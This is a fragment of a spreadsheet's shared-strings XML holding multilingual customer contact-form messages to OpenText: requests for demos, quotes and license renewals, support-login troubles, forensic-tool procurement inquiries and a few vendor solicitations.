    <t>Would like a demo of eDOCS DM._x000D_
Would also like help creating a Developer Program account.  I am getting an error.</t>
  </si>
  <si>
    <t>Testing</t>
  </si>
  <si>
    <t>This is a test, please ignore.</t>
  </si>
  <si>
    <t>One of our customers require that all UPCs/EANs be GS1 certified because they are unable to receive product in our fulfillment centers with uncertified UPCs.   _x000D_
_x000D_
How do we get these UPCs certified or obtain new certified UPCs from GS1_x000D_
_x000D_
Thank you,_x000D_
Ana Munguia_x000D_
615-771-5900</t>
  </si>
  <si>
    <t>We had previously been linked to Follett's Easy Link Account but once they were purchased by Nebraska Book we lost connection. We need to set up an account that will work with Nebraska Book Company's software so that when my Course Materials Manager puts together want lists, Open Text can forward that info on to wholesalers. We do not need any other functionality besides this so we are looking at cost and next steps to get this account opened and configured with our software.</t>
  </si>
  <si>
    <t>Benötige Informationen zum Upgrade von StreamServe 5.5 auf CC16 (neue Features, Supportlaufzeiten) und zu den Möglichkeiten des Upgrades auf ExStreamServe.</t>
  </si>
  <si>
    <t>I cannot able to register it says user already exists and while login i clicked forgot the password and no email sent to my email. This is my email-id: achyuth.bhatter@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently testing captiva 7.7 and require an updated license file for server ID 124015.  </t>
  </si>
  <si>
    <t>I would like a formal quote for encase please.</t>
  </si>
  <si>
    <t>We are looking to get a DMS/ECM system for use within the business and we would like to about what you have available. We also currently use StreamServer. Note we are UK based.</t>
  </si>
  <si>
    <t>RE: Expedite Acct # 857058 - We plan to being paying invoices via ACH. I would like to have an email address for remittance advice please. Email response is fine at ap@aprima.com. Thank you.</t>
  </si>
  <si>
    <t>I recently installed Host Explorer for 3270 emulation after using Micro Focus Rumba for many years. I have 2 issues/questions: 1) You permit keyboard mapping. How can I control the hex value transmitted for a given character? 2) Certain characters, when type on the screen get changed to a different character when the ENTER key is pushed. How is this prevented? (I am having issues with ¬ char)</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for an email to send a request for information on ICR solution. Please send to Amy Vallery. Thank you! </t>
  </si>
  <si>
    <t xml:space="preserve">I need software to search through approximately one million pages of documents, which were prepared in Relativity software format.    </t>
  </si>
  <si>
    <t>Hello,_x000D_
how are you?  We are at the infancy of a project around document management.  Would you be willing to present to us in Montreal around the industry's best practices around knowledge management and doc management?_x000D_
_x000D_
Please advise_x000D_
_x000D_
thanks_x000D_
_x000D_
Mathieu</t>
  </si>
  <si>
    <t>I encountered an error as your system was processing my payment for #RC416692.  I do not know if order/payment has been completed.</t>
  </si>
  <si>
    <t xml:space="preserve">Currently, Holland LP is running RightFax 10.6 and is looking to upgrade. What would be the process to upgrade our Server to run RightFax 16? </t>
  </si>
  <si>
    <t>Hi today Support Site doesn't work. When i clic on my support it redirects on a page when a banner is shown on this banner is wiritten: Request Confirmation Email. Clicking on this banner i receive a registration confirmation email but nothing changes._x000D_
Can you plase help me?</t>
  </si>
  <si>
    <t>We currently use the Quadient suite as part of our CCM / CX offering which we offer on a SaaS model. I am interested in better understanding OpenText Exstream for CCM, specifically document composition. I would like to arrange a conversation around the software suite, what it can do and the commericals.</t>
  </si>
  <si>
    <t>I need to create a new account.</t>
  </si>
  <si>
    <t>I'm interested in your healthcare fax solution.  I have 9 facilities that would like to receive 1500 pages per month at each facility and 4 users requiring access per facility.  I noted somewhere that it was 128bit encryption, but was curious about 256 bit at a minimum.</t>
  </si>
  <si>
    <t>Od 2- dni usiłuję zalogować się do Waszej pomocy technicznej !!!!!!!!!!!!!_x000D_
Próby logowania kończą się wpadnięciem w pętlę logowania !!!!!!_x000D_
Proszę o pomoc w tej sprawie._x000D_
For 2 days I am trying to log in to your technical support !!!!!!!!!!!!!_x000D_
The login attempts end with falling into the login loop !!!!!!_x000D_
I am asking for help in this matter.</t>
  </si>
  <si>
    <t xml:space="preserve">not able to access account settings. </t>
  </si>
  <si>
    <t>Hallo, ich kann mich leider nicht mehr auf der Supportseite anmelden. Ich bekomme beim Anmelden immer eine Fehlermeldung. Auch bei der "Passwort zurücksetzen" Funktion bekomme ich eine Fehlermeldung ( "Access denied" ). Können Sie bitte meinen User zurücksetzen und mir ein neues Passwort zukommen lassen. Ich benötige den Zugriff für den Download neuer Software Version und Patches für die Produkte "Captiva Capture" und "OpenText Capture Center". Danke .  Mit freundlichen Grüßen Marco Thärigen</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Are you able to let me know what the latest version of Teleforms is and if this is compatible with windows server 2012 r2 and windows 10 for the client machine?_x000D_
_x000D_
Thanks,_x000D_
Emma</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to have a quick call with you regarding - "OpenText Straight Through Processing (STP) for Securities" . Can you provide any details regarding this product?_x000D_
_x000D_
If you have few mins can you give me call at : 212-224-5221_x000D_
_x000D_
Thanks &amp; Regards!_x000D_
Milind Wankhede _x000D_
SMBC Capital Markets, Inc. </t>
  </si>
  <si>
    <t>We are seeking an enterprise level SMS messaging service to send text messages to corporate staff members. The service needs to be integrated with our AD and offer flexibility in sending messages to different groups of users. _x000D_
The service will be used by admins, senior management and by SolarWinds (via API integration)._x000D_
Is this something your cloud service could offer??</t>
  </si>
  <si>
    <t>Guten Tag,_x000D_
Wir benötigen Informationen zur Lösung Vendor Invoice Management opentext, insbesondere, ob die Lösung SAP HANA fähig ist und ein Preisangebot._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Katharina Orlamünder</t>
  </si>
  <si>
    <t>I need the new bank details of Opentext (before it was EasyLink), to be able to make payments to invoices. Please, I kindly need this as soon as possible.</t>
  </si>
  <si>
    <t>Can't access your support page. It says I have to verify my e-mail, which I have done several times now.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have an issue with using EnCase 8.08, I have imported categorised images from Griffeye Analyse into EnCase 8.08, however upon viewing some of the pictures in EnCase 8.08 the only way to view some of these pictures is by having to decode each individual picture. _x000D_
I was wanting to check if there is a quick way to decode multiple pictures since attempting to select more than one picture then decode will only decode one picture (usually the last or the first picture in the selected group). Since I am dealing with a large number of pictures needing to be decoded I would like to see if there is a quicker more efficient method of decoding multiple files or if there is an enscript which can decode multiple files.</t>
  </si>
  <si>
    <t>Hello. _x000D_
_x000D_
We are StreamServe from few years. Now we are upgrading from versión 4 to 6 and we need to upgrade the license file too. We purchase the license vía your partner Infor and they indicates to us, we must request the upgrade license to you directly._x000D_
_x000D_
Can you delivery to me the license file for the V6?_x000D_
_x000D_
Regards.</t>
  </si>
  <si>
    <t>We have EnCase Forensic Academic License and want to upgrade to the latest version, but I am not able to see any link or download center link from where it can be done._x000D_
_x000D_
I am also not able to go to the link my support from my account._x000D_
_x000D_
Please assist.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
auf der Suche nach einem Dokumenten Management System bin ich auf Ihre Seite gestoßen._x000D_
Sofern möglich würde ich gerne weiterführendes Informationalmaterial über Fuktionen wie Berechtigungskonzept, Freigabeworkflows und Revisionssicherheit erhalten._x000D_
Ist innerhalb des Dokumenten Mangement Systems auch die Option einer Vertragsdatenbank vorgesehen?_x000D_
_x000D_
Vielen Dank für Ihre Rückmeldung._x000D_
Herzlichen Gruß_x000D_
Marie-Luise Springer</t>
  </si>
  <si>
    <t>Please share reseller price for Hummingbird exceed 2008</t>
  </si>
  <si>
    <t>Good day. I've registered for the OpenText Enterprise Content Server Consultant Exam, but has not received my confirmation or invoice per email as your website indicate. Please send me the required information asap as I have a deadline to complete the exam.</t>
  </si>
  <si>
    <t>Buongiorno, sto creando un report con il vostro programma (OpenText Gupta Report Builder) però mi da problemi la creazione di un  Totals, più nel dettaglio il programma me lo fa creare per poi perdere la funzione che dovrebbe eseguire lasciando quindi un campo vuoto, come posso risolvere? ho già provato a ricreare il tutto ma c'è sempre questo problema</t>
  </si>
  <si>
    <t>I am unable to complete the verification through the verification email. Please advice on the same. _x000D_
Please provide access to my support.</t>
  </si>
  <si>
    <t xml:space="preserve">Confirming my identity &amp; bank verification. </t>
  </si>
  <si>
    <t>We are looking for advanced OCR software providers for an internal project requirement. Based on my research, I see that you may have some advanced OCR capabilities. _x000D_
_x000D_
Can we discuss further?</t>
  </si>
  <si>
    <t>Hello_x000D_
I've been following OpenText this year and find the mission and organizational culture compelling. I've researched positions aligned with my area of expertise but was not able to identify any. I am a Leadership Development Consultant with experience in R&amp;D.  I'd like to submit my resume for your consideration. What would be the appropriate email to do so?</t>
  </si>
  <si>
    <t>We have had a few Service Records to Cerner about issues with files crashing via AppXtender settings.  Cerner Support and their CPDI team is saying that we require to install patch 18 for AppXtender but this also requires re-registering our license key to our AppXtender license server.  We need to know about the process to apply the patch 18 to AppXtender and to re-register the license key.  This impact users in production since October 2018.</t>
  </si>
  <si>
    <t>Hello,   In past, CSC (now DXC) was able to get free training as an EMC partner - is this training still available with OpenText?_x000D_
_x000D_
Thanks, Keith</t>
  </si>
  <si>
    <t>We have a customer with daily Peer Ping Command timeout issues Daily. Looks like dll is crashing while loading test images._x000D_
They are using RECO:Using DLL C:\Program Files (x86)\Open Text\Capture Recognition Engine\Bin\ai050001.dll Wed Nov  1 10:03:22 2017_x000D_
_x000D_
Could you provide the details on what would be the latest released version of this and whether you would know if it would be likely to remedy this issue._x000D_
Thank You very much,for what you can do, as we have several customers with this issue for better than a year now_x000D_
Sincerely Mike Alldredge</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are looking at a potential replacement for Exstream Live Editor for our interactive letters, preferably a web based document editor.  I requested a demo of Empower editor last week, but haven’t received a response yet.  I am wondering who we might contact to schedule a demo for Empower editor or any other products that can fulfill this need._x000D_
_x000D_
_x000D_
Thanks,_x000D_
Garrett</t>
  </si>
  <si>
    <t>Received commission payment of $11,288.15 for reference number "Nov FY19 Comm" I need the names of the customers this commission is related to.</t>
  </si>
  <si>
    <t>Hello, how do I download the free forensic imager?_x000D_
encase-forensic-imager</t>
  </si>
  <si>
    <t>I need assistance with our RightFax server and email notification</t>
  </si>
  <si>
    <t>Hi, I bought a book, Integrating and Extending BIRT, 3rd Edition._x000D_
But I can not obtain the sample code in the book. The link (www actuate com birt contributions) in Chapter 20 is not valid. Could you tell me where can I get the sample code? Kind regards, Shinichi Yamada</t>
  </si>
  <si>
    <t>We currently have an account with GXS.  Apparently, some vendors were supposed to register their UPC’s through GS1.  Is GXS the same company as GS1?  _x000D_
_x000D_
Thank you,_x000D_
Ana Munguia</t>
  </si>
  <si>
    <t>Gostaríamos de uma apresentação dos produtos da empresa. Há representantes no Rio de Janeiro?</t>
  </si>
  <si>
    <t>Access required for the media management module from Home Box Office</t>
  </si>
  <si>
    <t xml:space="preserve">Please email the Captiva Capture 7.1 patch notes as the following link  I used to find them, but when launching ScanPlus from Windows10 client end-users sporadically receive message "failure to connect to server"_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I would like to request a demo</t>
  </si>
  <si>
    <t>I would like to start pulling together some information and ultimately some quotes for a paperless document management system.  We should have this available to AR, AP, Accounting, Customer Service, HR. 25 users with ability to increase. Monthly volume less than 1k of pages. Mobile access would be great.  The retention period: permanent documents down to a couple of years. We are manufacturing SMB located in Hampshire, IL.</t>
  </si>
  <si>
    <t>We are setting up ERP with a company NGC and we need to get VAN.  Please, advise.  Thanks,</t>
  </si>
  <si>
    <t>Hello, _x000D_
I have two defective Tableau Forensic Bridges as well as a damaged cord from a 3 PC set. I would like to create a RMA for all three defective items. _x000D_
Please let me know what the next few steps will be. _x000D_
Sincerely, _x000D_
Luna Rojas</t>
  </si>
  <si>
    <t>our Digital cert has expired...how do we get/create a new one ? we are running on Power 8 with OS/400</t>
  </si>
  <si>
    <t>for windows server 2016 we are deploying enstart64 version 7.10.05. is there an updated version for windows server 2019 or will that version suffice?</t>
  </si>
  <si>
    <t>Hello I would like a quote for my customer. This is all the information that they gave to me._x000D_
    Product / Service:  Open Text Exceed Maintenance_x000D_
    _x000D_
    QTY:  34_x000D_
     Period of performance date:  04/09/2019 TO  04/08/2020_x000D_
     Type:  RENEWAL</t>
  </si>
  <si>
    <t>Hello!  We are your neighbour located in the David Johnston Research and Technology Park in Waterloo, Ontario.  We are running a charity golf tournament and are reaching out to see if OpenText would like to be involved.  Is there someone I can reach out to at the Waterloo office to discuss sponsorship opportunities?  Thank you!  Angela</t>
  </si>
  <si>
    <t>Please provide contact details for Tim Spadzinski (email address and telephone number) via email to lynda.owens@metrolinx.xom</t>
  </si>
  <si>
    <t>Need License key or Download Links for Open Text Products (Exceed, Host Explorer, Secure Shell).</t>
  </si>
  <si>
    <t>I am trying to download the encase forensic imager from your site and when i fill out the form it say "thank you" then updates and the form reapears and i do not get the file.  How can i down this file?</t>
  </si>
  <si>
    <t>Hi, I'm trying to get a login to access your technical support site.  The original contact Keith Jenkins lost his support credentials and suggested I contact you directly._x000D_
_x000D_
Here is some relevant information regarding the original order:_x000D_
_x000D_
Sales Org:  US10_x000D_
Sales Ord. No. 25206_x000D_
Sales Ord Rep: malourdm@opentext.com_x000D_
Fulfillment number: 8000017139_x000D_
End User Info: 10424030 - State Bar of California_x000D_
Sales Person: William Plunkett_x000D_
_x000D_
Please contact me at 415.538.2413 if you have any questions or would like more information regarding my request._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Od niedawna mam problem z waszym produktem : Brava Deskop ver 16.4 CXL_x000D_
Nie otwiera plików  .dwg - zawiesza się !!!!!_x000D_
_x000D_
Recently I have a problem with your product: Brava Deskop ver 16.4 CXL_x000D_
Does not open .dwg files - hangs !!!!!</t>
  </si>
  <si>
    <t>query regarding Forensics tools</t>
  </si>
  <si>
    <t>Trying to engage with OpenText on ingestion issue. Need immediate attention.</t>
  </si>
  <si>
    <t>We need to change to whom the faxes go.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently using the Enterprise version of Rightfax but our usage of the product has dropped significantly to where we are finding it hard to justify the annual maintenance cost.  We want to know if we can change our Enterprise license to a Rightfax Express version with a smaller licensed channel count?  We are currently licensed for all 8  channels on a Brooktrout SR140 we only need four channels.  If this is not the case them we probably will drop Rightfax at the end of the current maintenance cycle. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>HELLO, I'M INTERESTED FINDING OUT HOW TO UPGRADE OUR CURRENT SERVER #AUSR-001-2105-486. ALSO HAVE OTHER QUESTIONS REGARDING THE SYSTEM.</t>
  </si>
  <si>
    <t>Hi there, _x000D_
_x000D_
I am contacting on behalf of x4 staff members at the General Medical Council that wish to attend the virtual session on the 4th March- '3-0177 What's New in OpenText Content Server v16.2'. _x000D_
_x000D_
Would you be able to provide a full price for this (GBP) including VAT? _x000D_
Do you have an invoice option? _x000D_
_x000D_
If so, in order to process an order we would need to add Opentext as a supplier to our accounting system and raise a PO to put on the invoice. _x000D_
We have a new supplier form that requires filling out, what would be the best email address to send this to? _x000D_
_x000D_
Many Thanks_x000D_
Libby</t>
  </si>
  <si>
    <t xml:space="preserve">132-33-ENT	Opentext 	"RightFax Enterprise Server Includes: 1 Document Delivery Channel, Unlimited User Clients, Web Access Client, OCR Routing and Conversion, Least Cost Routing, Secure SMTP Mail gateway for connection to cloud based and on-premise email systems. Alerting_x000D_
and Monitoring Functionality."	1_x000D_
132-33-CHUP-EFE	Opentext 	FoIP Enable an Existing RightFax Document Delivery Channel	1_x000D_
132-33-CHUP-FE	Opentext 	RightFax Additional Document DeliveryChannel - FoIP Enabled	7_x000D_
132-33-PDF	Opentext 	RightFax PDF Module	1_x000D_
132-33-ENCRYPT	Opentext 	RightFax Encryption Module.	1_x000D_
132-34-SSUP	Opentext 	OpenText Standard Support for RightFax Production Server, 1-Year during business hours (8am-8pm EST). Provides supportvia phone, remote access and the OpenText Knowledge Center. Also includes full and point upgrade media on versions released during the active term of the contract. All upgrade media is upon request and downloadable from the downloads section of the RightFax Knowledge Center.	1_x000D_
DM-MTFRFX	Opentext 	Mail-To-Fax Connector for RightFax. OPEN MARKET ITEM.	1_x000D_
DM-MTFSUP	Opentext 	Standard Support for Mail-To-Fax Connector, 1-Year, New Sale. OPEN MARKET ITEM.	1_x000D_
132-34-A003	Opentext 	Implementation - RightFax (Onsite, Weekends) Project includes installation, configuration and all pre-installation planning. A technical call is required prior to install to review specifics of project and prepare a written playbook. Work cannot be scheduled to be completed until playbook has been reviewed and approved. Typically, some portions of project can be completed remotely and balance is completed onsite.	3_x000D_
AT-EUT	Opentext 	End User/Admin Training. Includes up to 4 hours of training. Can be end user and/or Admin training and must be scheduled after installation has been completed.	1_x000D_
</t>
  </si>
  <si>
    <t>I would like a quote to add 100 Fax Server Connector 3.0 for Hewlett Packard MFP licenses to our rightfax environment_x000D_
End User Information:_x000D_
CTCA Shared Services - EU0097726_x000D_
SUID 06576-12259</t>
  </si>
  <si>
    <t>I am looking for an adapter to connect a Fibre Channel Hard disk to my tableau, do you sell anything that would wor?</t>
  </si>
  <si>
    <t>This is a test</t>
  </si>
  <si>
    <t>We have two EnCase Dongles (ID G2002020940) &amp; (ID G2002079986).  I need to know if they support EnCase V8.  If they do, where can I get the download?  And if they don't, how much would it be to upgrade?  Thank you._x000D_
_x000D_
V/r_x000D_
_x000D_
Detective C. Franks_x000D_
Tulare County Sheriff's Office_x000D_
(559) 687-7037</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Our client, Lithuanian Police FSC, will purchase _x000D_
EnCase Forensic, 3 Year Subscription Renewal._x000D_
_x000D_
It would be great, to receive your quote._x000D_
_x000D_
Thanks,_x000D_
Gintas_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">we currently have trusted link for i.  Looking to see what the cost is for the XML module._x000D_
</t>
  </si>
  <si>
    <t>I'd like to speak to you about your capabilities for document scanning, storage and OCR. Don't bother calling, I'm only available via email.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Last week I have requested a proposal for your Teleform product, which we may be able to use at one of our customers. In the mean time, we have received a second request from another customer who is also looking for a solution to extract data from his handwritten forms._x000D_
Unfortunately, I have not received any offer from you yet._x000D_
Is there a trial I could download to check if your product fits our requirements?_x000D_
_x000D_
Many thanks,_x000D_
Johan_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We need some information regarding the license issued for Angloamerican.</t>
  </si>
  <si>
    <t>Currently we are using LabVIEW to write to a SQL database.  We would like instead to have LabVIEW write to a local drive and have software that would that the information from the local drive and write that information to our SQL database.  Do you have software that can do that and what is the price?_x000D_
Thank you</t>
  </si>
  <si>
    <t>I would like to speak with an OpenText representative to learn more about A) The OpenText Support Model, and B) The OpenText Partners and Alliances (license reselling, development services, support services).</t>
  </si>
  <si>
    <t>We have been using Open Text Exceed at our company for a few years as an Interface to our Linux server.  We are in the process of implementing a remote access server that a few people can use when they work remotely and for testing.  We would like to put a copy of Exceed on the server for the administrator to use.  I have some questions on licensing to understand if or what I may need to purchase.  I'm also interested in possibly upgrading the licensing that we currently have.  _x000D_
_x000D_
Thanks,_x000D_
Diana</t>
  </si>
  <si>
    <t xml:space="preserve">One of the customers that I do support (AMERICAN EXPRESS) has the product Expedite Base V4.6.1 installed. They wants to know what is the current release and service available for it.  Thanks. </t>
  </si>
  <si>
    <t>LB</t>
  </si>
  <si>
    <t xml:space="preserve">evaluating correspondence and document management for a government client. need features, demo, whitepapers, local implementation partners. thx </t>
  </si>
  <si>
    <t>I would like to apply for the position of intern at the Hyderabad Office in India._x000D_
Please refer the process of applying to the postion of intern. _x000D_
Thank you</t>
  </si>
  <si>
    <t>We are looking for your kind support to participate in a tender process in CCPWC,Assam for the below products:_x000D_
1. Encase Forensics : 5 Qty_x000D_
2. SATA/IDE Write Blocker: 5 Qty_x000D_
_x000D_
Kindly share us MAF &amp; Pricing_x000D_
RFP Number#Tender No.: E/VII/146-18/CID/228    Dtd : 16-02-2019_x000D_
_x000D_
Our Details : M/S Trans Virtual Pvt Ltd, Golden Woods, RGB Road, Guwahati – 781005, Assam_x000D_
 _x000D_
End Customer Name &amp; Address:_x000D_
To_x000D_
OFFICE OF THE ADDITIONAL DIRECTOR GENERAL OF POLICE, (CID),ASSAM, _x000D_
CID HQ,ULUBARI, _x000D_
GUWAHATI - 781007</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren, Servus, _x000D_
_x000D_
hier in unserem Abteilung nützen wir Ihre OpenText HostExplorer mit einem FTP zu verbinden. Ich versuche die Verbindung durch die folgende Art der Firewall zu öffnen._x000D_
remoteid@firewallid@remotehost_x000D_
port: 21_x000D_
Aber bekomme ich immer noch die folgende Fehlermeldung:_x000D_
421 Server not available, closing control connection._x000D_
die Host Explorer versucht, die Daten von einem Telnet Host zu lesen und in FTP zu schreiben. Auf Grund Anmeldung fehlgeschlagen hab ich keine Zugriff zum speicherte Daten im FTP. Können Sie bitte mir helfen, wieso ich nicht anmelden kann?_x000D_
Ich danke Ihnen im Voraus._x000D_
_x000D_
Mit herzlichen Grüßen_x000D_
Sina Mosleh</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like to start the Vendor Invoice Management (VIM) Consultant Certification Exam v7.5_x000D_
I already registered, but I did not get any payment information (also I entered the Code PSSUBCERT for 50% early booking discount, but it did not show during registration)._x000D_
Also i don't know where to start the exam._x000D_
Kind regards_x000D_
Alexander Rolleder</t>
  </si>
  <si>
    <t>We are Directorate of Forensic Science Laboratories, Mumbai,Home Dept; Govt. of Maharashtra , India._x000D_
we have published a e-tender for Hard Disk data recovery forensic  tool ._x000D_
_x000D_
We are in process to procure 10 Licenses of EnCase_x000D_
As End User there is requirement of price list of the product._x000D_
Requesting you to  provide original Price list of Manufacturer  for the said product. _x000D_
Looking forward from you.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
unsere Ermittlungen haben ergeben, dass die Frima Stream Serve Deutschland GmbH mit Ihnen verschmolzen ist. Wir haben in unserem Insolvenzverfahren die Stream Serve Deutschland GmbH als Gläubiger, die eine Forderung zur Tabelle angemeldet haben. Unser Insolvenzverfahren ist zwischenzeitlich abgeschlossen, so dass demnächst eine Quote an die Gläubiger ausgezahlt werden soll. Wir bitten um Mitteilung der aktuellen Bankverbindung, damit wir demnächst die Quote an Sie überweisen können. Ferner bitten wir um Nachweis für das Amtsgericht Paderborn, dass die Verschmelzung mit der Gläubigerin erfolgt ist. Vielen Dank im Voraus. Insolvenzverwalterbüro Dr. Köhler und Partner, Kolpingstraße 17, 59555 Lippstadt </t>
  </si>
  <si>
    <t>Would like to understand your capability of providing Business Intelligence Platform for professional services. Please get in touch for a meeting. Thank you.</t>
  </si>
  <si>
    <t>Hello._x000D_
I'm writing, because of our interest in your system, with a request to receive initial pricing for:_x000D_
a) document worflow - one process (registering, commenting, working on, tracking changes and giving opinion on agreements and NDA's) for 100 users_x000D_
b) document workflow - license for 2000 users, where we can internally model, change and set new processes without limitations._x000D_
Our requirements:_x000D_
1. System installed on-premise_x000D_
2. Integrations: SSO with Microsoft Exchange and AD_x000D_
_x000D_
Regards,_x000D_
Mateusz Bartela_x000D_
KPMG PL</t>
  </si>
  <si>
    <t>We would like to discuss further on potential projects for Malaysia Utilities/Energy provider like Tenaga Nasional Berhad . For info we are system integrator for ICT infra for TNB since 1997 until present.</t>
  </si>
  <si>
    <t>I need a contact name and email to send an request for proposal for an unstructured data reporting tool relating to personally identifiable information._x000D_
_x000D_
Thanks_x000D_
Alan</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
 _x000D_
Accurate Background, Inc. is a background screening company, and we would like to verify details submitted by a person listing your company as an employer. Please provide contact information for your Human Resources department or the designated contact handling verifications of employment.  Thank you for your time. _x000D_
 _x000D_
Best Regards,_x000D_
</t>
  </si>
  <si>
    <t>I've worked on Opentext BPM (Metasorm) for many years. I was wondering how I would be able to upskill myself on the opentext platform</t>
  </si>
  <si>
    <t>We asked OpenText to know more about their speech to text Solution, So Far we did not receive any response from OpenText !?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I stumbled upon your website and found it quite impressive._x000D_
 _x000D_
I'm Kristi (Business Development Executive) in a reliable ISO Certified, Google Partner Web Agency and interested to share this business collaboration opportunity with you. _x000D_
_x000D_
We are a 1 Stop Web Shop having a team of 40 Expert Web Professionals who can efficiently handle all your additional work as your back-end team. _x000D_
_x000D_
Standard Price: $ 12 per hour_x000D_
_x000D_
What services do we offer?_x000D_
_x000D_
•WordPress, Magento, Drupal, PHP, Prestashop, MVC Frameworks,.Net_x000D_
•Mobile Apps Development_x000D_
•Logo, Graphic &amp; Web Design- Custom design or theme based_x000D_
•SEO, SMO, PPC, ORM_x000D_
_x000D_
Why us?_x000D_
• Work and Customer Ownership will be yours (NDA secured)._x000D_
• Save upto 70% of your cost by outsourcing your work to us_x000D_
• Ability to handle the smallest task to comprehensive project efficiently._x000D_
• Actively concentrate more on expanding your business with new customers while we, as your back-end team, handle the technical stuff for you._x000D_
 _x000D_
Our Work Process:_x000D_
 _x000D_
You'll get Daily Work Report, real-time Work-in-Progress Update and quick communication with your 100% satisfaction._x000D_
 _x000D_
Please lemme know your Phone no. / Skype id/ Email if you're interested to get more details._x000D_
 _x000D_
Warm Regards,_x000D_
_x000D_
Kristi Jencks_x000D_
</t>
  </si>
  <si>
    <t>The license of encase dongle No V7 Cert is due to a license of 17/11/2019. how can we fix this problem?</t>
  </si>
  <si>
    <t>Please give us a qoute on price per license., We intend to acquire additional licenses.</t>
  </si>
  <si>
    <t>I’m looking for help with a customer of mine who has ApplicationXtender 6.5 and needs help upgrading.  Can opentext direct professional services assist me with this customer?</t>
  </si>
  <si>
    <t xml:space="preserve">Our end customer has an urgent request for:_x000D_
OpenText Windows Viewer licenses_x000D_
Quantity: 4_x000D_
Please provide us the reseller quote._x000D_
_x000D_
End customer is “ Thyssenkrupp Steel”_x000D_
</t>
  </si>
  <si>
    <t>Please have a Government account representative contact me right away about a demo of your Content Services Platform and Case management Framework.  I prefer email</t>
  </si>
  <si>
    <t>I have applied for the job opening Senior Consultant - ECM	Hoofddord on 21-02-20. Unfortunate I have received not a notification or a confirmation. _x000D_
_x000D_
Does anyone has a status update please?_x000D_
_x000D_
Regards, _x000D_
_x000D_
Marco Hirschmann</t>
  </si>
  <si>
    <t>Does OpenText still maintain a listing of EnCE certified individuals? I can't seem to find it on the website or thru google searches. I just wanted to provide the link to a prospective employer._x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to understand what are OpenText capabilities to automate accounts receivable process.  High level, we are looking for an application that can extract data fields from purchase orders (different templates &amp; languages).  Then, compare data to existing customer data base/projects and finally raise projects or sales orders on an automated fashion. </t>
  </si>
  <si>
    <t>Ommy Exhibition is a professional booth building company located in Las Vegas. Our company makes exhibiting easier, saving our clients time and money! We create stunning exhibits specializing in turnkey operations. We would like to offer a complimentary booth design for the upcoming 2019 DAC Show in Las Vegas. Please feel free to contact me or visit our website. Thanks, Donald C.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I’m interested in gaining full access to see all the discussions in the product forums._x000D_
Kindly help me further._x000D_
_x000D_
Looking forward to hearing from you soon._x000D_
_x000D_
Thanks &amp; Warm Regards,_x000D_
SM.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Could anyone throw some light on the federation issue. ?_x000D_
 Is it with the pre-defined federation job or the method that triggers it or while configuring the federation object in DA?_x000D_
 Any response would be appreciated._x000D_
_x000D_
The error encountered is below:-_x000D_
_x000D_
_x000D_
Start of dm_ldif_status output:_x000D_
_x000D_
End of dm_ldif_status output_x000D_
_x000D_
Warning: the method dm_ldif_status report output had no content. Check to see if the method exists and verify the command and path as specified in the method_verb attribute of the method._x000D_
 Possible cause: 1)CLASSPATH is not set to $DM_HOME/bin. 2)dm_ldif_status doesn't exist in $DM_HOME/bin._x000D_
_x000D_
FederationStatus Tool had ERRORS at 2/8/2019 09:37:48. View the log of last run (in folder /Temp/Jobs/FederationStatus) for details._x000D_
_x000D_
FederationStatus Tool had ERRORS at 2/8/2019 09:37:48. View the log of last run (in folder /Temp/Jobs/FederationStatus) for details._x000D_
 Report End 2/8/2019 09:37:48_x000D_
 --- End D:\Documentum\dba\log\00002711\sysadmin\FederationStatusDoc.txt report output ---_x000D_
_x000D_
how to configure ldap config object and pertaining to federation and the embedded character associated with it to fix the issue further.?_x000D_
_x000D_
Kindly let me know further.?_x000D_
_x000D_
Thanks &amp; Warm Regards,_x000D_
 SM._x000D_
</t>
  </si>
  <si>
    <t>Interested in exploring whether Opentext can provide TELUS with a Document Repository Solution for our Fibre Deployment Standards and Research Documentation. This documentation is currently stored through an in-house repository that we are looking to replace. TELUS would like to explore whether Opentext can provide us with an alternative to what we currently have.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to determine the dates of data entered in our database.  We're trying to determine what data we have that is less than 30 days old, what data is 30-180 days old and what older than that.  _x000D_
_x000D_
I've spoken with our local DBA's and they're referred e to application support.  Is there anyway to determine this information within the Content Server application itself?_x000D_
_x000D_
Any help would be appreciated. </t>
  </si>
  <si>
    <t>TESTING - DO NOT INCLUDE</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am interested in your OpenText Documentum for eTMF and would appreciate the opportunity to discuss._x000D_
Thanks,_x000D_
Chris</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
We received a notice in our Billing inbox about outstanding invoices 400044796 (4/30 for $100.00), 9000872835 (11/30 for $108.88)), 9000926590 (12/31 for $108.88)), and unfortunately, we never received the original invoices to be processed. Would it be possible to send us PDFs of each of these so we may send payment?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Maria</t>
  </si>
  <si>
